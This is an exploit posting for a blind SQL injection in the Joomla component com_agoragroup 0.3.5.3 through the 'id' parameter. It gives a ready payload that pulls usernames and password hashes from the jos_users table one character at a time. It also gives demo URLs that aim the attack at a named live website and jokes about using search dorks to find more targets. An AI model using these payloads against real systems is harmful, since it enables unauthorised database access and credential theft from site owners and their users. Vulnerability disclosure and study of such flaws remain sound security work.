++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ Joomla Component com_agoragroup (id) Blind SQL-injection Vulnerability ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ################################################### [+] Author : Chip D3 Bi0s [+] Greetz : d4n!ux x_jeshua + eCORE + Painboy + rayok3nt & N03! [+] Vulnerability : Blind SQL injection [+] Google Dork : imagine ;) -------------------------------------------------- author : Russell... author Email : chipdebios@gmail.com ################################################### Example: http://localHost/path/index.php?option=com_agoragroup&con=groupdetail&id=2[SQL code] SQL code: and ascii(substring((SELECT concat(username,0x3a,password) from jos_users limit 0,1),1,1))>96 DEMO: http://notaryzip.com/index.php?option=com_agoragroup&con=groupdetail&id=2+and+(select+substring(concat(1,password),1,1)+from+jos_users+limit+0,1)=1 http://notaryzip.com/index.php?option=com_agoragroup&con=groupdetail&id=2+and+(select+substring(concat(1,username),1,1)+from+jos_users+limit+0,1)=1 http://notaryzip.com/index.php?option=com_agoragroup&con=groupdetail&id=2+and+ascii(substring((SELECT+concat(username,0x3a,password)+from+jos_users+limit+0,1),1,1))=72 etc, etc.... +++++++++++++++++++++++++++++++++++++++ #[!] Produced in South America +++++++++++++++++++++++++++++++++++++++ AgoraGroup 0.3.5.3 AgoraGroups- Groups component for Agora Forum v.3+ http://www.gnu.org/licenses/gpl-2.0.html GNU/GPL The JoomlaMe team info@easy-joomla.org http://www.easy-joomla.org